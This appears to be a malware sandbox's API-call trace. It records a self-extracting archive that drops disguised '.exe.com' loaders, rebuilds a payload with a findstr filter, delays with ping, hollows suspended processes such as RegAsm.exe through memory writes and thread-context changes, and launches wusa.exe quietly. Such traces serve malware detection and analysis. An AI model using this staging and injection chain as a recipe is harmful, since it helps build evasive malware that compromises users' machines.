inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 532
thread_handle: 0x00000090
process_identifier: 456
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
track: 1
command_line: Vacillavo.exe.com K
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 456
1 0 0

CreateProcessInternalW

thread_identifier: 1788
thread_handle: 0x0000008c
process_identifier: 2756
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 1172
thread_handle: 0x00000090
process_identifier: 2948
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
track: 1
command_line: Naso.exe.com B
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2948
1 0 0

CreateProcessInternalW

thread_identifier: 2560
thread_handle: 0x00000094
process_identifier: 204
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 30
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 1080
thread_handle: 0x0000012c
process_identifier: 1612
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

thread_identifier: 1376
thread_handle: 0x00000128
process_identifier: 1088
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000012c
1 1 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000128
process_identifier: 2312
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000012c
1 1 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2312
1 0 0

CreateProcessInternalW

thread_identifier: 1276
thread_handle: 0x00000170
process_identifier: 2648
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000016c
1 1 0

NtGetContextThread

thread_handle: 0x00000170
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 413696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x005b0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000016c
1 0 0

WriteProcessMemory

buffer:
base_address: 0x005b0000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ[ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 5963740
registers.edi: 0
registers.eax: 6114119
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000170
process_identifier: 2648
1 0 0

CreateProcessInternalW

thread_identifier: 1820
thread_handle: 0x0000012c
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com K
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

thread_identifier: 1600
thread_handle: 0x0000016c
process_identifier: 1376
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001f4
1 1 0

NtGetContextThread

thread_handle: 0x0000016c
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x00600000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001f4
1 0 0

WriteProcessMemory

buffer:
base_address: 0x00600000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ`ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 6290364
registers.edi: 0
registers.eax: 6455306
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000016c
process_identifier: 1376
1 0 0

CreateProcessInternalW

thread_identifier: 108
thread_handle: 0x0000012c
process_identifier: 1424
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com B
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

thread_identifier: 328
thread_handle: 0x000001fc
process_identifier: 1852
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000204
1 1 0

NtGetContextThread

thread_handle: 0x000001fc
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 122880
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x001c0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

WriteProcessMemory

buffer:
base_address: 0x001c0000
process_identifier: 1852
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿû~(ü~Pý~€›mèÿÿ jHâý~±
base_address: 0x7efde000
process_identifier: 1852
process_handle: 0x00000204
1 1 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 1703656
registers.edi: 0
registers.eax: 1932866
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 1852
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 204
1 0 0

NtResumeThread

thread_handle: 0x00000178
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

thread_handle: 0x000001e8
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

thread_handle: 0x00000224
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

thread_handle: 0x000003c8
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

thread_identifier: 1108
thread_handle: 0x00000380
process_identifier: 2440
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000388
1 1 0

NtResumeThread

thread_handle: 0x00000380
suspend_count: 1
process_identifier: 2440
1 0 0

CreateProcessInternalW

thread_identifier: 2072
thread_handle: 0x0000026c
process_identifier: 2496
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 2496
1 0 0

CreateProcessInternalW

thread_identifier: 2356
thread_handle: 0x00000104
process_identifier: 1428
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 1428
1 0 0

CreateProcessInternalW

thread_identifier: 2092
thread_handle: 0x000002b8
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0